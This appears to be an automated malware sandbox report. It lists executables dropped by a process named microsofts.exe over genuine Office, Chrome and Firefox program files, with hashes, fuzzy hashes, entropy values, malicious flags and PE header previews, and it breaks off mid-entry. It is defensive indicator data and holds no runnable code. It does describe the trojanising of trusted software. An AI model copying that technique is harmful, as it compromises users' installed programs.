                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....b.Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.356065620091348
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:PXr/SVMxWssqjnhMgeiCl7G0nehbGZpbD:z1xpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BF7151F657F9384347E9D41DCA8E031A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3B9E6407C22BB03A27D6918C8CA6C37992636FE8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBB8BF067B073E75C63536B55689EF966C7DEECFB17B418A4212AB089147EE2E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7CE6067EB1CB715CA517D870A830B54893760C9CAA4DA2964A16855DD29712D52D94EF92EADAC9DA0A348877CFD09B81657ED006396B4CCB62761841DD26F45C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2486359434151515
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:196608:KhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOmVQBWG:KhRCpGpMJMrbp8JjpNdNlc56B
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E43B99D8CB413960A14F026A03520911
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1509964FAB609272321AFB211E18128347395CC4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E1844078273E91ECE642140C69F20AA34AB9546FA3C7E13906E6A591972798F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DCDD004DEDD005F4223ABACCEF52157B225866FE74F2ED3E5A50D8F7A265D771B6B3D0D7790012D1555E5E2EE6492DC2B75DB20A1B6B4435B086508FEC03D779
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................Y..... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.788996425483491
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:H83pZ3kd0CuEeN0LUmRXzYs65meDmg27RnWGj:fKuUQY15dD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:35A136A0B18C8C46D2A8B76396F42AC9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4D6B820BDE8428515C4E278E1F81687FE6A35411
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5A5753B7C15985AC74FC8D4B8045E1891AE83195DC12D45B6428969DDF30879
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EE759245B13772627F4F82B4CB0E5BCBB45387F53AE1783B74A3617274CA75818706333DC2E586AA6DC99FC64F3334969D8DB3F246FE507D94C6D82B387F69F3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......u"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.670831788400185
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:VErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MV:DA4oGlcR+glEdOPKzgVZ4D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3D02AE016BA9FF25068BF5A9E5EB7BB9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A39F4201F0BED3AEF54E17499DF8BEA02F4146AE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4972CC98D0880BF029C14E39EB9E666DE4183A0D91E12D0E1ABA892149F3E981
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A66776761ACFA252A301CF581CEAE2C57CED8D4DCC55DEC235C2CC936F6177F10AF37639E9104E05F139040C6E013EC4A7CBCEA59A93358DBFE121207350866F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......hL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.82975883281978
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:M8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKC:Hv2gM+qwXLg7pPgw/DSZHuD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97F997A4DE8B41D02F5AA58C60E03677
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:69B7297A788C656ADB65DF22249CF1A2171575FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:229289C53DB9C6FEE84F1E7957F796BB173FEBC665041F96D281B02A7C0F8917
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D9B53732F361AF1F413E7F5015AFA85CB8F7CC79F6459C1908297A9E4D6391C333A1896B001B68DC98EBD7F058015A18A3414D437F90E68E80A364368E6D460F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....M.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8297589303019635
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:L8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKC:Kv2gM+qwXLg7pPgw/DSZHuD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3E02E7707093A825DFDB0D14CC7E9217
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8C966A44DBC50B2DEE6C3D5DF0465CF20D3D37D5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:27A7A61FB5232E2C2031D265FE6813B692A35979ACDC0818FC5D1D45D87549BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:022CB24A3FC0400A4EC79FCA0DF8200358463C2DFFDD68FD2850272F007483513AEF0C94ABBC92E9B9A35D083E7222B1A569371CC02CDAF5D1C96B35D18633DB
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.953569859996277
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:etjqL8fH+8aUbp8D/8+xyWAhsqjnhMgeiCl7G0nehbGZpbD:WjKK+81FI/8z3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C9F2F9EF2FF061181F249E7E66972498
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5644942D39365AF36CE1F67D9016FF1624D6D501
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CA9BB93CB293023D6AECD83A9C7B18724FCCCD8B417E53EFF22C25F9654F4B2D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB55348872C37E2B6024D562632817C43C47AB0E9B417BA27329CB7C4E7AB4F973F810E6DB999BDD3A5ED8CD809990FE9AAFABD50AD908841F0377F937CAC9F7
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"....... ... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.03238534366217
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:eAMsOu3JfCIGnZuTodRFYKBrFDbWpFDmg27RnWGj:eAMa38ZuTS4D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3C601040EB8FAE987EF67EF219C03A85
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1FFC8950054A7C207A725D66AF1ABCD358395176
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:60D83E515282459B15318B3C6EB0CA5FB07C4794EEB1E3F2C118AF43218D709D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:79619022A5584FA379CC7E1BE768226C28994B202471A399EF1B3CA3289AEA8BE3EAADC7C250AFB8C202A1370E0DE5435BC2E4544EE15FD5FC2D852A9923AA49
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....X.$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.104331844257692
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:vwbK7tnhD4aH6wD2Krx5NgOOagQE8JlsqjnhMgeiCl7G0nehbGZpbD:vSK7Fhslq2EPfOGEsDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F4CF372B6AF2D271140F99A26C83B2DC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2704DE85C3EA6B85D8DF82381AFEFC7CE7DB189A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:49D7499C8795FCD1DDDCAD11901400D92E9561AB2DF8B1ED57C4246C8186177F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D65575C148266BE62372F38ACA4983E5D6F7B172FA468511C777328B87B8A9D31BBD428A3F8846C43FE918BC495079F8D6FF1F7E7374F39557DA052A59AD676
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.....................................P.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1580594788434135
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:KKI7Twj5KDHxJ1FxyD+/wsG18bbQ1sqjnhMgeiCl7G0nehbGZpbD:Kv7e0j31mD+/wDGbaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D9573878544A5F514FE2B505F83D4162
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:98EBE322F98B8686C64DB464AD5BDB5ECEEEBBEE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B7C55463B6BD77B5626EDEBE68BEEA7FE3AD40C7886AB71D1E77A4303244AA6C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4DE686311056788B2D9FA2AA91A588BB33FE783865261AC69620F4A60107228EE6C855A7770E2A4382081BE27FFCCDC50D95E5F04B6C1671261249EE5EC85B5C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@....................................Fn.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.377431536923245
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:/QUVPDHhSKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:oyhSKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A475FF94B4168A7A16C3BDED37BD607D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:63A1FB75250CCB1078092414DC826038D94B6D82
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BB7AC9B9C46FF5EF8D1D881C7BBD10BDFE1F2B9D8C882B7C19A451AC6331A5EB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:47E5C834E74DB275299CB7888D804DE45134379E7792283A055A9BB24588B4B1D9D8762EC93C17EBF6B89C4DC6C695ED1F0DF6580F105DF02265E44D9065628A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......q..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.222108277987428
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:IsFfc1VyFn5UQn652bO4HNsqjnhMgeiCl7G0nehbGZpbD:IsFcIn5rJ7Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2AEBD58BBFF45DFEF8FB0A72DA0407BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A758764BF9A55BFD6B31078FDAA953FF03E6843C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0135F22594314FAB070B64CA3E01C0D50BDDAE61FBE9E4F9B78F34AE554425FB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:193F4B8B2ED0A735B015ED903751823501814A86CB14E15A175C672A94591E06103ADFF9ACCF1198DF7B277662506DE474FFD7BD150DDF716F2C571FFF90B620
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.494266509578081
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Vt9o6p4xQbiKI69wpemIwpel9+sqjnhMgeiCl7G0nehbGZpbD:Vt9faQbtl2peapelkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FA73EA81C4DBA42DFA7FF58E26F8E8F9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9D8B53501D99662D1B81FBA1BF5548BD21F48D02
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:91801009169F012BE5A044DBF387FB2F5437DE709CCCC7175A987B0C474F0C11
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:605E85687891C240AC9A073C5BDF5C260138ED2F6B8A27D45F6E4BAE4A72C3C91B06C9EBF45877960D542721BE43815A200024AD0B3B4B32AA91BBD9F5BFB74D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
